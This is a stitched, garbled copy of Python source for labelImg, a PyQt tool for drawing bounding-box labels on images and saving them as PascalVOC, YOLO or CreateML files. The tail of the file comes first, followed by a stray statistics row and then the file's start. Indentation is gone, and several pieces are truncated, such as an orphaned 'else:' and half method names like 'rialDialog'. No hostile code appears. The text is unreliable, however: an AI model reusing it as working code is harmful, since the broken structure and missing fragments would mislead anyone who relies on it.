if self.lastOpenDir and os.path.exists(self.lastOpenDir):
defaultOpenDirPath = self.lastOpenDir
else:
defaultOpenDirPath = os.path.dirname(self.filePath) if self.filePath else '.'
if silent!=True :
targetDirPath = ustr(QFileDialog.getExistingDirectory(self,
'%s - Open Directory' % __appname__, defaultOpenDirPath,
QFileDialog.ShowDirsOnly | QFileDialog.DontResolveSymlinks))
else:
targetDirPath = ustr(defaultOpenDirPath)
self.lastOpenDir = targetDirPath
self.importDirImages(targetDirPath)
def importDirImages(self, dirpath):
if not self.mayContinue() or not dirpath:
return
self.lastOpenDir = dirpath
self.dirname = dirpath
self.filePath = None
self.fileListWidget.clear()
self.mImgList = self.scanAllImages(dirpath)
self.openNextImg()
for imgPath in self.mImgList:
item = QListWidgetItem(imgPath)
self.fileListWidget.addItem(item)
def verifyImg(self, _value=False):
# Proceding next image without dialog if having any label
if self.filePath is not None:
try:
self.labelFile.toggleVerify()
except AttributeError:
# If the labelling file does not exist yet, create if and
# re-save it with the verified attribute.
self.saveFile()
if self.labelFile != None:
self.labelFile.toggleVerify()
else:
return
self.canvas.verified = self.labelFile.verified
self.paintCanvas()
self.saveFile()
def openPrevImg(self, _value=False):
# Proceding prev image without dialog if having any label
if self.autoSaving.isChecked():
if self.defaultSaveDir is not None:
if self.dirty is True:
self.saveFile()
else:
self.changeSavedirDialog()
return
if not self.mayContinue():
return
if len(self.mImgList) <= 0:
return
if self.filePath is None:
return
currIndex = self.mImgList.index(self.filePath)
if currIndex - 1 >= 0:
filename = self.mImgList[currIndex - 1]
if filename:
self.loadFile(filename)
def openNextImg(self, _value=False):
# Proceding prev image without dialog if having any label
if self.autoSaving.isChecked():
if self.defaultSaveDir is not None:
if self.dirty is True:
self.saveFile()
else:
self.changeSavedirDialog()
return
if not self.mayContinue():
return
if len(self.mImgList) <= 0:
return
filename = None
if self.filePath is None:
filename = self.mImgList[0]
else:
currIndex = self.mImgList.index(self.filePath)
if currIndex + 1 < len(self.mImgList):
filename = self.mImgList[currIndex + 1]
if filename:
self.loadFile(filename)
def openFile(self, _value=False):
if not self.mayContinue():
return
path = os.path.dirname(ustr(self.filePath)) if self.filePath else '.'
formats = ['*.%s' % fmt.data().decode("ascii").lower() for fmt in QImageReader.supportedImageFormats()]
filters = "Image & Label files (%s)" % ' '.join(formats + ['*%s' % LabelFile.suffix])
filename = QFileDialog.getOpenFileName(self, '%s - Choose Image or Label file' % __appname__, path, filters)
if filename:
if isinstance(filename, (tuple, list)):
filename = filename[0]
self.loadFile(filename)
def saveFile(self, _value=False):
if self.defaultSaveDir is not None and len(ustr(self.defaultSaveDir)):
if self.filePath:
imgFileName = os.path.basename(self.filePath)
savedFileName = os.path.splitext(imgFileName)[0]
savedPath = os.path.join(ustr(self.defaultSaveDir), savedFileName)
self._saveFile(savedPath)
else:
imgFileDir = os.path.dirname(self.filePath)
imgFileName = os.path.basename(self.filePath)
savedFileName = os.path.splitext(imgFileName)[0]
savedPath = os.path.join(imgFileDir, savedFileName)
self._saveFile(savedPath if self.labelFile
else self.saveFileDialog(removeExt=False))
def saveFileAs(self, _value=False):
assert not self.image.isNull(), "cannot save empty image"
self._saveFile(self.saveFileDialog())
def saveFileDialog(self, removeExt=True):
caption = '%s - Choose File' % __appname__
filters = 'File (*%s)' % LabelFile.suffix
openDialogPath = self.currentPath()
dlg = QFileDialog(self, caption, openDialogPath, filters)
dlg.setDefaultSuffix(LabelFile.suffix[1:])
dlg.setAcceptMode(QFileDialog.AcceptSave)
filenameWithoutExtension = os.path.splitext(self.filePath)[0]
dlg.selectFile(filenameWithoutExtension)
dlg.setOption(QFileDialog.DontUseNativeDialog, False)
if dlg.exec_():
fullFilePath = ustr(dlg.selectedFiles()[0])
if removeExt:
return os.path.splitext(fullFilePath)[0] # Return file path without the extension.
else:
return fullFilePath
return ''
def _saveFile(self, annotationFilePath):
if annotationFilePath and self.saveLabels(annotationFilePath):
self.setClean()
self.statusBar().showMessage('Saved to %s' % annotationFilePath)
self.statusBar().show()
def closeFile(self, _value=False):
if not self.mayContinue():
return
self.resetState()
self.setClean()
self.toggleActions(False)
self.canvas.setEnabled(False)
self.actions.saveAs.setEnabled(False)
def deleteImg(self):
deletePath = self.filePath
if deletePath is not None:
self.openNextImg()
if os.path.exists(deletePath):
os.remove(deletePath)
self.importDirImages(self.lastOpenDir)
def resetAll(self):
self.settings.reset()
self.close()
proc = QProcess()
proc.startDetached(os.path.abspath(__file__))
def mayContinue(self):
if not self.dirty:
return True
else:
discardChanges = self.discardChangesDialog()
if discardChanges == QMessageBox.No:
return True
elif discardChanges == QMessageBox.Yes:
self.saveFile()
return True
else:
return False
def discardChangesDialog(self):
yes, no, cancel = QMessageBox.Yes, QMessageBox.No, QMessageBox.Cancel
msg = u'You have unsaved changes, would you like to save them and proceed?\nClick "No" to undo all changes.'
return QMessageBox.warning(self, u'Attention', msg, yes | no | cancel)
def errorMessage(self, title, message):
return QMessageBox.critical(self, title,
'<p><b>%s</b></p>%s' % (title, message))
def currentPath(self):
return os.path.dirname(self.filePath) if self.filePath else '.'
def chooseColor1(self):
color = self.colorDialog.getColor(self.lineColor, u'Choose line color',
default=DEFAULT_LINE_COLOR)
if color:
self.lineColor = color
Shape.line_color = color
self.canvas.setDrawingColor(color)
self.canvas.update()
self.setDirty()
def deleteSelectedShape(self):
self.remLabel(self.canvas.deleteSelected())
self.setDirty()
if self.noShapes():
for action in self.actions.onShapesPresent:
action.setEnabled(False)
def chshapeLineColor(self):
color = self.colorDialog.getColor(self.lineColor, u'Choose line color',
default=DEFAULT_LINE_COLOR)
if color:
self.canvas.selectedShape.line_color = color
self.canvas.update()
self.setDirty()
def chshapeFillColor(self):
color = self.colorDialog.getColor(self.fillColor, u'Choose fill color',
default=DEFAULT_FILL_COLOR)
if color:
self.canvas.selectedShape.fill_color = color
self.canvas.update()
self.setDirty()
def copyShape(self):
self.canvas.endMove(copy=True)
self.addLabel(self.canvas.selectedShape)
self.setDirty()
def moveShape(self):
self.canvas.endMove(copy=False)
self.setDirty()
def loadPredefinedClasses(self, predefClassesFile):
if os.path.exists(predefClassesFile) is True:
with codecs.open(predefClassesFile, 'r', 'utf8') as f:
for line in f:
line = line.strip()
if self.labelHist is None:
self.labelHist = [line]
else:
self.labelHist.append(line)
def loadPascalXMLByFilename(self, xmlPath):
if self.filePath is None:
return
if os.path.isfile(xmlPath) is False:
return
self.set_format(FORMAT_PASCALVOC)
tVocParseReader = PascalVocReader(xmlPath)
shapes = tVocParseReader.getShapes()
self.loadLabels(shapes)
self.canvas.verified = tVocParseReader.verified
def loadYOLOTXTByFilename(self, txtPath):
if self.filePath is None:
return
if os.path.isfile(txtPath) is False:
return
self.set_format(FORMAT_YOLO)
tYoloParseReader = YoloReader(txtPath, self.image)
shapes = tYoloParseReader.getShapes()
print (shapes)
self.loadLabels(shapes)
self.canvas.verified = tYoloParseReader.verified
def loadCreateMLJSONByFilename(self, jsonPath, filePath):
if self.filePath is None:
return
if os.path.isfile(jsonPath) is False:
return
self.set_format(FORMAT_CREATEML)
crmlParseReader = CreateMLReader(jsonPath, filePath)
shapes = crmlParseReader.get_shapes()
self.loadLabels(shapes)
self.canvas.verified = crmlParseReader.verified
def copyPreviousBoundingBoxes(self):
currIndex = self.mImgList.index(self.filePath)
if currIndex - 1 >= 0:
prevFilePath = self.mImgList[currIndex - 1]
self.showBoundingBoxFromAnnotationFile(prevFilePath)
self.saveFile()
def togglePaintLabelsOption(self):
for shape in self.canvas.shapes:
shape.paintLabel = self.displayLabelOption.isChecked()
def toogleDrawSquare(self):
self.canvas.setDrawingShapeToSquare(self.drawSquaresOption.isChecked())
def inverted(color):
return QColor(*[255 - v for v in color.getRgb()])
def read(filename, default=None):
try:
reader = QImageReader(filename)
reader.setAutoTransform(True)
return reader.read()
except:
return default
def get_main_app(argv=[]):
"""
Standard boilerplate Qt application code.
Do everything but app.exec_() -- so that we can test the application in one thread
"""
app = QApplication(argv)
app.setApplicationName(__appname__)
app.setWindowIcon(newIcon("app"))
# Tzutalin 201705+: Accept extra agruments to change predefined class file
argparser = argparse.ArgumentParser()
argparser.add_argument("image_dir", nargs="?")
argparser.add_argument("predefined_classes_file",
default=os.path.join(os.path.dirname(__file__), "data", "predefined_classes.txt"),
nargs="?")
argparser.add_argument("save_dir", nargs="?")
args = argparser.parse_args(argv[1:])
# Usage : labelImg.py image predefClassFile saveDir
win = MainWindow(args.image_dir,
args.predefined_classes_file,
args.save_dir)
win.show()
return app, win
def main():
'''construct main app and run it'''
app, _win = get_main_app(sys.argv)
return app.exec_()
if __name__ == '__main__':
sys.exit(main())
| 40.118707 | 169 | 0.6102 |
import argparse
import codecs
import distutils.spawn
import os.path
import platform
import re
import sys
import subprocess
from functools import partial
from collections import defaultdict
try:
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
except ImportError:
if sys.version_info.major >= 3:
import sip
sip.setapi('QVariant', 2)
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from combobox import ComboBox
from libs.resources import *
from libs.constants import *
from libs.utils import *
from libs.settings import Settings
from libs.shape import Shape, DEFAULT_LINE_COLOR, DEFAULT_FILL_COLOR
from libs.stringBundle import StringBundle
from libs.canvas import Canvas
from libs.zoomWidget import ZoomWidget
from libs.labelDialog import LabelDialog
from libs.colorDialog import ColorDialog
from libs.labelFile import LabelFile, LabelFileError, LabelFileFormat
from libs.toolBar import ToolBar
from libs.pascal_voc_io import PascalVocReader
from libs.pascal_voc_io import XML_EXT
from libs.yolo_io import YoloReader
from libs.yolo_io import TXT_EXT
from libs.create_ml_io import CreateMLReader
from libs.create_ml_io import JSON_EXT
from libs.ustr import ustr
from libs.hashableQListWidgetItem import HashableQListWidgetItem
__appname__ = 'labelImg'
class WindowMixin(object):
def menu(self, title, actions=None):
menu = self.menuBar().addMenu(title)
if actions:
addActions(menu, actions)
return menu
def toolbar(self, title, actions=None):
toolbar = ToolBar(title)
toolbar.setObjectName(u'%sToolBar' % title)
toolbar.setToolButtonStyle(Qt.ToolButtonTextUnderIcon)
if actions:
addActions(toolbar, actions)
self.addToolBar(Qt.LeftToolBarArea, toolbar)
return toolbar
class MainWindow(QMainWindow, WindowMixin):
FIT_WINDOW, FIT_WIDTH, MANUAL_ZOOM = list(range(3))
def __init__(self, defaultFilename=None, defaultPrefdefClassFile=None, defaultSaveDir=None):
super(MainWindow, self).__init__()
self.setWindowTitle(__appname__)
self.settings = Settings()
self.settings.load()
settings = self.settings
self.stringBundle = StringBundle.getBundle()
getStr = lambda strId: self.stringBundle.getString(strId)
self.defaultSaveDir = defaultSaveDir
self.labelFileFormat = settings.get(SETTING_LABEL_FILE_FORMAT, LabelFileFormat.PASCAL_VOC)
self.mImgList = []
self.dirname = None
self.labelHist = []
self.lastOpenDir = None
self.dirty = False
self._noSelectionSlot = False
self._beginner = True
self.screencastViewer = self.getAvailableScreencastViewer()
self.screencast = "https://youtu.be/p0nR2YsCY_U"
self.loadPredefinedClasses(defaultPrefdefClassFile)
self.labelDialog = LabelDialog(parent=self, listItem=self.labelHist)
self.itemsToShapes = {}
self.shapesToItems = {}
self.prevLabelText = ''
listLayout = QVBoxLayout()
listLayout.setContentsMargins(0, 0, 0, 0)
self.useDefaultLabelCheckbox = QCheckBox(getStr('useDefaultLabel'))
self.useDefaultLabelCheckbox.setChecked(False)
self.defaultLabelTextLine = QLineEdit()
useDefaultLabelQHBoxLayout = QHBoxLayout()
useDefaultLabelQHBoxLayout.addWidget(self.useDefaultLabelCheckbox)
useDefaultLabelQHBoxLayout.addWidget(self.defaultLabelTextLine)
useDefaultLabelContainer = QWidget()
useDefaultLabelContainer.setLayout(useDefaultLabelQHBoxLayout)
self.diffcButton = QCheckBox(getStr('useDifficult'))
self.diffcButton.setChecked(False)
self.diffcButton.stateChanged.connect(self.btnstate)
self.editButton = QToolButton()
self.editButton.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
listLayout.addWidget(self.editButton)
listLayout.addWidget(self.diffcButton)
listLayout.addWidget(useDefaultLabelContainer)
self.comboBox = ComboBox(self)
listLayout.addWidget(self.comboBox)
self.labelList = QListWidget()
labelListContainer = QWidget()
labelListContainer.setLayout(listLayout)
self.labelList.itemActivated.connect(self.labelSelectionChanged)
self.labelList.itemSelectionChanged.connect(self.labelSelectionChanged)
self.labelList.itemDoubleClicked.connect(self.editLabel)
self.labelList.itemChanged.connect(self.labelItemChanged)
listLayout.addWidget(self.labelList)
self.dock = QDockWidget(getStr('boxLabelText'), self)
self.dock.setObjectName(getStr('labels'))
self.dock.setWidget(labelListContainer)
self.fileListWidget = QListWidget()
self.fileListWidget.itemDoubleClicked.connect(self.fileitemDoubleClicked)
filelistLayout = QVBoxLayout()
filelistLayout.setContentsMargins(0, 0, 0, 0)
filelistLayout.addWidget(self.fileListWidget)
fileListContainer = QWidget()
fileListContainer.setLayout(filelistLayout)
self.filedock = QDockWidget(getStr('fileList'), self)
self.filedock.setObjectName(getStr('files'))
self.filedock.setWidget(fileListContainer)
self.zoomWidget = ZoomWidget()
self.colorDialog = ColorDialog(parent=self)
self.canvas = Canvas(parent=self)
self.canvas.zoomRequest.connect(self.zoomRequest)
self.canvas.setDrawingShapeToSquare(settings.get(SETTING_DRAW_SQUARE, False))
scroll = QScrollArea()
scroll.setWidget(self.canvas)
scroll.setWidgetResizable(True)
self.scrollBars = {
Qt.Vertical: scroll.verticalScrollBar(),
Qt.Horizontal: scroll.horizontalScrollBar()
}
self.scrollArea = scroll
self.canvas.scrollRequest.connect(self.scrollRequest)
self.canvas.newShape.connect(self.newShape)
self.canvas.shapeMoved.connect(self.setDirty)
self.canvas.selectionChanged.connect(self.shapeSelectionChanged)
self.canvas.drawingPolygon.connect(self.toggleDrawingSensitive)
self.setCentralWidget(scroll)
self.addDockWidget(Qt.RightDockWidgetArea, self.dock)
self.addDockWidget(Qt.RightDockWidgetArea, self.filedock)
self.filedock.setFeatures(QDockWidget.DockWidgetFloatable)
self.dockFeatures = QDockWidget.DockWidgetClosable | QDockWidget.DockWidgetFloatable
self.dock.setFeatures(self.dock.features() ^ self.dockFeatures)
action = partial(newAction, self)
quit = action(getStr('quit'), self.close,
'Ctrl+Q', 'quit', getStr('quitApp'))
open = action(getStr('openFile'), self.openFile,
'Ctrl+O', 'open', getStr('openFileDetail'))
opendir = action(getStr('openDir'), self.openDirDialog,
'Ctrl+u', 'open', getStr('openDir'))
copyPrevBounding = action(getStr('copyPrevBounding'), self.copyPreviousBoundingBoxes,
'Ctrl+v', 'paste', getStr('copyPrevBounding'))
changeSavedir = action(getStr('changeSaveDir'), self.changeSavedirDialog,
'Ctrl+r', 'open', getStr('changeSavedAnnotationDir'))
openAnnotation = action(getStr('openAnnotation'), self.openAnnotationDialog,
'Ctrl+Shift+O', 'open', getStr('openAnnotationDetail'))
openNextImg = action(getStr('nextImg'), self.openNextImg,
'd', 'next', getStr('nextImgDetail'))
openPrevImg = action(getStr('prevImg'), self.openPrevImg,
'a', 'prev', getStr('prevImgDetail'))
verify = action(getStr('verifyImg'), self.verifyImg,
'space', 'verify', getStr('verifyImgDetail'))
save = action(getStr('save'), self.saveFile,
'Ctrl+S', 'save', getStr('saveDetail'), enabled=False)
def getFormatMeta(format):
if format == LabelFileFormat.PASCAL_VOC:
return ('&PascalVOC', 'format_voc')
elif format == LabelFileFormat.YOLO:
return ('&YOLO', 'format_yolo')
elif format == LabelFileFormat.CREATE_ML:
return ('&CreateML', 'format_createml')
save_format = action(getFormatMeta(self.labelFileFormat)[0],
self.change_format, 'Ctrl+',
getFormatMeta(self.labelFileFormat)[1],
getStr('changeSaveFormat'), enabled=True)
saveAs = action(getStr('saveAs'), self.saveFileAs,
'Ctrl+Shift+S', 'save-as', getStr('saveAsDetail'), enabled=False)
close = action(getStr('closeCur'), self.closeFile, 'Ctrl+W', 'close', getStr('closeCurDetail'))
deleteImg = action(getStr('deleteImg'), self.deleteImg, 'Ctrl+Shift+D', 'close', getStr('deleteImgDetail'))
resetAll = action(getStr('resetAll'), self.resetAll, None, 'resetall', getStr('resetAllDetail'))
color1 = action(getStr('boxLineColor'), self.chooseColor1,
'Ctrl+L', 'color_line', getStr('boxLineColorDetail'))
createMode = action(getStr('crtBox'), self.setCreateMode,
'w', 'new', getStr('crtBoxDetail'), enabled=False)
editMode = action('&Edit\nRectBox', self.setEditMode,
'Ctrl+J', 'edit', u'Move and edit Boxs', enabled=False)
create = action(getStr('crtBox'), self.createShape,
'w', 'new', getStr('crtBoxDetail'), enabled=False)
delete = action(getStr('delBox'), self.deleteSelectedShape,
'Delete', 'delete', getStr('delBoxDetail'), enabled=False)
copy = action(getStr('dupBox'), self.copySelectedShape,
'Ctrl+D', 'copy', getStr('dupBoxDetail'),
enabled=False)
advancedMode = action(getStr('advancedMode'), self.toggleAdvancedMode,
'Ctrl+Shift+A', 'expert', getStr('advancedModeDetail'),
checkable=True)
hideAll = action('&Hide\nRectBox', partial(self.togglePolygons, False),
'Ctrl+H', 'hide', getStr('hideAllBoxDetail'),
enabled=False)
showAll = action('&Show\nRectBox', partial(self.togglePolygons, True),
'Ctrl+A', 'hide', getStr('showAllBoxDetail'),
enabled=False)
help = action(getStr('tutorial'), self.showTutorialDialog, None, 'help', getStr('tutorialDetail'))
showInfo = action(getStr('info'), self.showInfoDialog, None, 'help', getStr('info'))
zoom = QWidgetAction(self)
zoom.setDefaultWidget(self.zoomWidget)
self.zoomWidget.setWhatsThis(
u"Zoom in or out of the image. Also accessible with"
" %s and %s from the canvas." % (fmtShortcut("Ctrl+[-+]"),
fmtShortcut("Ctrl+Wheel")))
self.zoomWidget.setEnabled(False)
zoomIn = action(getStr('zoomin'), partial(self.addZoom, 10),
'Ctrl++', 'zoom-in', getStr('zoominDetail'), enabled=False)
zoomOut = action(getStr('zoomout'), partial(self.addZoom, -10),
'Ctrl+-', 'zoom-out', getStr('zoomoutDetail'), enabled=False)
zoomOrg = action(getStr('originalsize'), partial(self.setZoom, 100),
'Ctrl+=', 'zoom', getStr('originalsizeDetail'), enabled=False)
fitWindow = action(getStr('fitWin'), self.setFitWindow,
'Ctrl+F', 'fit-window', getStr('fitWinDetail'),
checkable=True, enabled=False)
fitWidth = action(getStr('fitWidth'), self.setFitWidth,
'Ctrl+Shift+F', 'fit-width', getStr('fitWidthDetail'),
checkable=True, enabled=False)
zoomActions = (self.zoomWidget, zoomIn, zoomOut,
zoomOrg, fitWindow, fitWidth)
self.zoomMode = self.MANUAL_ZOOM
self.scalers = {
self.FIT_WINDOW: self.scaleFitWindow,
self.FIT_WIDTH: self.scaleFitWidth,
self.MANUAL_ZOOM: lambda: 1,
}
edit = action(getStr('editLabel'), self.editLabel,
'Ctrl+E', 'edit', getStr('editLabelDetail'),
enabled=False)
self.editButton.setDefaultAction(edit)
shapeLineColor = action(getStr('shapeLineColor'), self.chshapeLineColor,
icon='color_line', tip=getStr('shapeLineColorDetail'),
enabled=False)
shapeFillColor = action(getStr('shapeFillColor'), self.chshapeFillColor,
icon='color', tip=getStr('shapeFillColorDetail'),
enabled=False)
labels = self.dock.toggleViewAction()
labels.setText(getStr('showHide'))
labels.setShortcut('Ctrl+Shift+L')
labelMenu = QMenu()
addActions(labelMenu, (edit, delete))
self.labelList.setContextMenuPolicy(Qt.CustomContextMenu)
self.labelList.customContextMenuRequested.connect(
self.popLabelListMenu)
self.drawSquaresOption = QAction('Draw Squares', self)
self.drawSquaresOption.setShortcut('Ctrl+Shift+R')
self.drawSquaresOption.setCheckable(True)
self.drawSquaresOption.setChecked(settings.get(SETTING_DRAW_SQUARE, False))
self.drawSquaresOption.triggered.connect(self.toogleDrawSquare)
self.actions = struct(save=save, save_format=save_format, saveAs=saveAs, open=open, close=close, resetAll = resetAll, deleteImg = deleteImg,
lineColor=color1, create=create, delete=delete, edit=edit, copy=copy,
createMode=createMode, editMode=editMode, advancedMode=advancedMode,
shapeLineColor=shapeLineColor, shapeFillColor=shapeFillColor,
zoom=zoom, zoomIn=zoomIn, zoomOut=zoomOut, zoomOrg=zoomOrg,
fitWindow=fitWindow, fitWidth=fitWidth,
zoomActions=zoomActions,
fileMenuActions=(
open, opendir, save, saveAs, close, resetAll, quit),
beginner=(), advanced=(),
editMenu=(edit, copy, delete,
None, color1, self.drawSquaresOption),
beginnerContext=(create, edit, copy, delete),
advancedContext=(createMode, editMode, edit, copy,
delete, shapeLineColor, shapeFillColor),
onLoadActive=(
close, create, createMode, editMode),
onShapesPresent=(saveAs, hideAll, showAll))
self.menus = struct(
file=self.menu('&File'),
edit=self.menu('&Edit'),
view=self.menu('&View'),
help=self.menu('&Help'),
recentFiles=QMenu('Open &Recent'),
labelList=labelMenu)
self.autoSaving = QAction(getStr('autoSaveMode'), self)
self.autoSaving.setCheckable(True)
self.autoSaving.setChecked(settings.get(SETTING_AUTO_SAVE, False))
self.singleClassMode = QAction(getStr('singleClsMode'), self)
self.singleClassMode.setShortcut("Ctrl+Shift+S")
self.singleClassMode.setCheckable(True)
self.singleClassMode.setChecked(settings.get(SETTING_SINGLE_CLASS, False))
self.lastLabel = None
self.displayLabelOption = QAction(getStr('displayLabel'), self)
self.displayLabelOption.setShortcut("Ctrl+Shift+P")
self.displayLabelOption.setCheckable(True)
self.displayLabelOption.setChecked(settings.get(SETTING_PAINT_LABEL, False))
self.displayLabelOption.triggered.connect(self.togglePaintLabelsOption)
addActions(self.menus.file,
(open, opendir, copyPrevBounding, changeSavedir, openAnnotation, self.menus.recentFiles, save, save_format, saveAs, close, resetAll, deleteImg, quit))
addActions(self.menus.help, (help, showInfo))
addActions(self.menus.view, (
self.autoSaving,
self.singleClassMode,
self.displayLabelOption,
labels, advancedMode, None,
hideAll, showAll, None,
zoomIn, zoomOut, zoomOrg, None,
fitWindow, fitWidth))
self.menus.file.aboutToShow.connect(self.updateFileMenu)
addActions(self.canvas.menus[0], self.actions.beginnerContext)
addActions(self.canvas.menus[1], (
action('&Copy here', self.copyShape),
action('&Move here', self.moveShape)))
self.tools = self.toolbar('Tools')
self.actions.beginner = (
open, opendir, changeSavedir, openNextImg, openPrevImg, verify, save, save_format, None, create, copy, delete, None,
zoomIn, zoom, zoomOut, fitWindow, fitWidth)
self.actions.advanced = (
open, opendir, changeSavedir, openNextImg, openPrevImg, save, save_format, None,
createMode, editMode, None,
hideAll, showAll)
self.statusBar().showMessage('%s started.' % __appname__)
self.statusBar().show()
self.image = QImage()
self.filePath = ustr(defaultFilename)
self.lastOpenDir= None
self.recentFiles = []
self.maxRecent = 7
self.lineColor = None
self.fillColor = None
self.zoom_level = 100
self.fit_window = False
self.difficult = False
recentFileQStringList = settings.get(SETTING_RECENT_FILES)
self.recentFiles = [ustr(i) for i in recentFileQStringList]
else:
self.recentFiles = recentFileQStringList = settings.get(SETTING_RECENT_FILES)
size = settings.get(SETTING_WIN_SIZE, QSize(600, 500))
position = QPoint(0, 0)
saved_position = settings.get(SETTING_WIN_POSE, position)
for i in range(QApplication.desktop().screenCount()):
if QApplication.desktop().availableGeometry(i).contains(saved_position):
position = saved_position
break
self.resize(size)
self.move(position)
saveDir = ustr(settings.get(SETTING_SAVE_DIR, None))
self.lastOpenDir = ustr(settings.get(SETTING_LAST_OPEN_DIR, None))
if self.defaultSaveDir is None and saveDir is not None and os.path.exists(saveDir):
self.defaultSaveDir = saveDir
self.statusBar().showMessage('%s started. Annotation will be saved to %s' %
(__appname__, self.defaultSaveDir))
self.statusBar().show()
self.restoreState(settings.get(SETTING_WIN_STATE, QByteArray()))
Shape.line_color = self.lineColor = QColor(settings.get(SETTING_LINE_COLOR, DEFAULT_LINE_COLOR))
Shape.fill_color = self.fillColor = QColor(settings.get(SETTING_FILL_COLOR, DEFAULT_FILL_COLOR))
self.canvas.setDrawingColor(self.lineColor)
Shape.difficult = self.difficult
def xbool(x):
if isinstance(x, QVariant):
return x.toBool()
return bool(x)
if xbool(settings.get(SETTING_ADVANCE_MODE, False)):
self.actions.advancedMode.setChecked(True)
self.toggleAdvancedMode()
self.updateFileMenu()
if self.filePath and os.path.isdir(self.filePath):
self.queueEvent(partial(self.importDirImages, self.filePath or ""))
elif self.filePath:
self.queueEvent(partial(self.loadFile, self.filePath or ""))
self.zoomWidget.valueChanged.connect(self.paintCanvas)
self.populateModeActions()
self.labelCoordinates = QLabel('')
self.statusBar().addPermanentWidget(self.labelCoordinates)
if self.filePath and os.path.isdir(self.filePath):
self.openDirDialog(dirpath=self.filePath, silent=True)
def keyReleaseEvent(self, event):
if event.key() == Qt.Key_Control:
self.canvas.setDrawingShapeToSquare(False)
def keyPressEvent(self, event):
if event.key() == Qt.Key_Control:
self.canvas.setDrawingShapeToSquare(True)
save_format):
if save_format == FORMAT_PASCALVOC:
self.actions.save_format.setText(FORMAT_PASCALVOC)
self.actions.save_format.setIcon(newIcon("format_voc"))
self.labelFileFormat = LabelFileFormat.PASCAL_VOC
LabelFile.suffix = XML_EXT
elif save_format == FORMAT_YOLO:
self.actions.save_format.setText(FORMAT_YOLO)
self.actions.save_format.setIcon(newIcon("format_yolo"))
self.labelFileFormat = LabelFileFormat.YOLO
LabelFile.suffix = TXT_EXT
elif save_format == FORMAT_CREATEML:
self.actions.save_format.setText(FORMAT_CREATEML)
self.actions.save_format.setIcon(newIcon("format_createml"))
self.labelFileFormat = LabelFileFormat.CREATE_ML
LabelFile.suffix = JSON_EXT
def change_format(self):
if self.labelFileFormat == LabelFileFormat.PASCAL_VOC:
self.set_format(FORMAT_YOLO)
elif self.labelFileFormat == LabelFileFormat.YOLO:
self.set_format(FORMAT_CREATEML)
elif self.labelFileFormat == LabelFileFormat.CREATE_ML:
self.set_format(FORMAT_PASCALVOC)
else:
raise ValueError('Unknown label file format.')
self.setDirty()
def noShapes(self):
return not self.itemsToShapes
def toggleAdvancedMode(self, value=True):
self._beginner = not value
self.canvas.setEditing(True)
self.populateModeActions()
self.editButton.setVisible(not value)
if value:
self.actions.createMode.setEnabled(True)
self.actions.editMode.setEnabled(False)
self.dock.setFeatures(self.dock.features() | self.dockFeatures)
else:
self.dock.setFeatures(self.dock.features() ^ self.dockFeatures)
def populateModeActions(self):
if self.beginner():
tool, menu = self.actions.beginner, self.actions.beginnerContext
else:
tool, menu = self.actions.advanced, self.actions.advancedContext
self.tools.clear()
addActions(self.tools, tool)
self.canvas.menus[0].clear()
addActions(self.canvas.menus[0], menu)
self.menus.edit.clear()
actions = (self.actions.create,) if self.beginner()\
else (self.actions.createMode, self.actions.editMode)
addActions(self.menus.edit, actions + self.actions.editMenu)
def setBeginner(self):
self.tools.clear()
addActions(self.tools, self.actions.beginner)
def setAdvanced(self):
self.tools.clear()
addActions(self.tools, self.actions.advanced)
def setDirty(self):
self.dirty = True
self.actions.save.setEnabled(True)
def setClean(self):
self.dirty = False
self.actions.save.setEnabled(False)
self.actions.create.setEnabled(True)
def toggleActions(self, value=True):
for z in self.actions.zoomActions:
z.setEnabled(value)
for action in self.actions.onLoadActive:
action.setEnabled(value)
def queueEvent(self, function):
QTimer.singleShot(0, function)
def status(self, message, delay=5000):
self.statusBar().showMessage(message, delay)
def resetState(self):
self.itemsToShapes.clear()
self.shapesToItems.clear()
self.labelList.clear()
self.filePath = None
self.imageData = None
self.labelFile = None
self.canvas.resetState()
self.labelCoordinates.clear()
self.comboBox.cb.clear()
def currentItem(self):
items = self.labelList.selectedItems()
if items:
return items[0]
return None
def addRecentFile(self, filePath):
if filePath in self.recentFiles:
self.recentFiles.remove(filePath)
elif len(self.recentFiles) >= self.maxRecent:
self.recentFiles.pop()
self.recentFiles.insert(0, filePath)
def beginner(self):
return self._beginner
def advanced(self):
return not self.beginner()
def getAvailableScreencastViewer(self):
osName = platform.system()
if osName == 'Windows':
return ['C:\\Program Files\\Internet Explorer\\iexplore.exe']
elif osName == 'Linux':
return ['xdg-open']
elif osName == 'Darwin':
return ['open']
rialDialog(self):
subprocess.Popen(self.screencastViewer + [self.screencast])
def showInfoDialog(self):
from libs.__init__ import __version__
msg = u'Name:{0} \nApp Version:{1} \n{2} '.format(__appname__, __version__, sys.version_info)
QMessageBox.information(self, u'Information', msg)
def createShape(self):
assert self.beginner()
self.canvas.setEditing(False)
self.actions.create.setEnabled(False)
def toggleDrawingSensitive(self, drawing=True):
self.actions.editMode.setEnabled(not drawing)
if not drawing and self.beginner():
print('Cancel creation.')
self.canvas.setEditing(True)
self.canvas.restoreCursor()
self.actions.create.setEnabled(True)
def toggleDrawMode(self, edit=True):
self.canvas.setEditing(edit)
self.actions.createMode.setEnabled(edit)
self.actions.editMode.setEnabled(not edit)
def setCreateMode(self):
assert self.advanced()
self.toggleDrawMode(False)
def setEditMode(self):
assert self.advanced()
self.toggleDrawMode(True)
self.labelSelectionChanged()
def updateFileMenu(self):
currFilePath = self.filePath
def exists(filename):
return os.path.exists(filename)
menu = self.menus.recentFiles
menu.clear()
files = [f for f in self.recentFiles if f !=
currFilePath and exists(f)]
for i, f in enumerate(files):
icon = newIcon('labels')
action = QAction(
icon, '&%d %s' % (i + 1, QFileInfo(f).fileName()), self)
action.triggered.connect(partial(self.loadRecent, f))
menu.addAction(action)
def popLabelListMenu(self, point):
self.menus.labelList.exec_(self.labelList.mapToGlobal(point))
def editLabel(self):
if not self.canvas.editing():
return
item = self.currentItem()
if not item:
return
text = self.labelDialog.popUp(item.text())
if text is not None:
item.setText(text)
item.setBackground(generateColorByText(text))
self.setDirty()
self.updateComboBox()
def fileitemDoubleClicked(self, item=None):
currIndex = self.mImgList.index(ustr(item.text()))
if currIndex < len(self.mImgList):
filename = self.mImgList[currIndex]
if filename:
self.loadFile(filename)
def btnstate(self, item= None):
if not self.canvas.editing():
return
item = self.currentItem()
if not item:
item = self.labelList.item(self.labelList.count()-1)
